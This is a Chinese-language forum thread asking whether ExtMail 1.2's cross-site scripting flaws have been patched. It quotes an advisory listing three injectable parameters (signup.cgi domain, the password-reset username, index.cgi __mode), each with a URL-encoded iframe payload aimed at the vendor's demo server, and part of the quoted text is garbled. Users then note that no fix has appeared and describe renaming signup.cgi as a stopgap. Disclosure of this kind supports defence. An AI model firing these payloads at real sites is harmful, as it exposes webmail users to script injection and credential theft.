年前发现的漏洞现在修复了么?
没看到有新版本推出呀…… 能将漏洞描述一下吗? ExtMail1.2 邮件系统跨站脚本漏洞[url]http://tech.ddvip.com/2010-02/1265339285144859.html[/url]
影响版本:
ExtMail 1.2漏洞描述:
北洋贱队2009.12.31首发
Extmail 是一个以perl语言编写,面向大容量/ISP级应用,免费的高性能Webmail软件。
最新版本为1.2,检测出三出处跨站漏洞。
1.免费新用户注册的"signup.cgi"对‘domain’参数未进行参数过滤,构建恶意脚本代码作为参数数据,并诱使用Х梦识褚饬唇樱纱シ⒍褚饨疟敬朐谀勘暧没т榔魃现葱校贾旅舾行畔⑿孤?
demo:[url]http://demo.extmail.org/extman/cgi/signup.cgi?domain=%22%3E%3Ciframe%20src=http://www.gohack.org%3E[/url]
2.重置密码"forgetpwd.cgi"为对提交的用户名进行检测过滤,导致产生跨站漏洞
demo:[url]http://demo.extmail.org/extman/cgi/changepwd.cgi[/url]
post: %22%3E%3Ciframe%20src=http://www.gohack.org%3E
3.webmail登录状态验证为进行参数过滤,导致跨站漏洞,可可触发恶意脚本代码在目标用户浏览器上执行。
demo:[url]http://demo.extmail.org/extmail/cgi/index.cgi?__mode=%22%3E%3Ciframe%20src=http://www.gohack.org%3E[/url]
<*参考
[url]http://www.extmail.org[/url]
[url]http://www.gohack.org[/url]
*>
测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!%22%3E%3Ciframe%20src=http://www.gohack.org%3ESEBUG安全建议:
以上漏洞均以提交给ExtMail官方,静待补丁发放 是说已经修复了么?
因为我下载最新的源码包好像没看到有版本更新,所以不确定…… 没有修复吧。没看到新版出现。。 第一个漏洞,我是把signup.cgi改名了,禁止使用此文件也禁止了注册用户的功能。 啥时候推出补丁呀 唉,急呀…… 再顶一下下
页:
[1]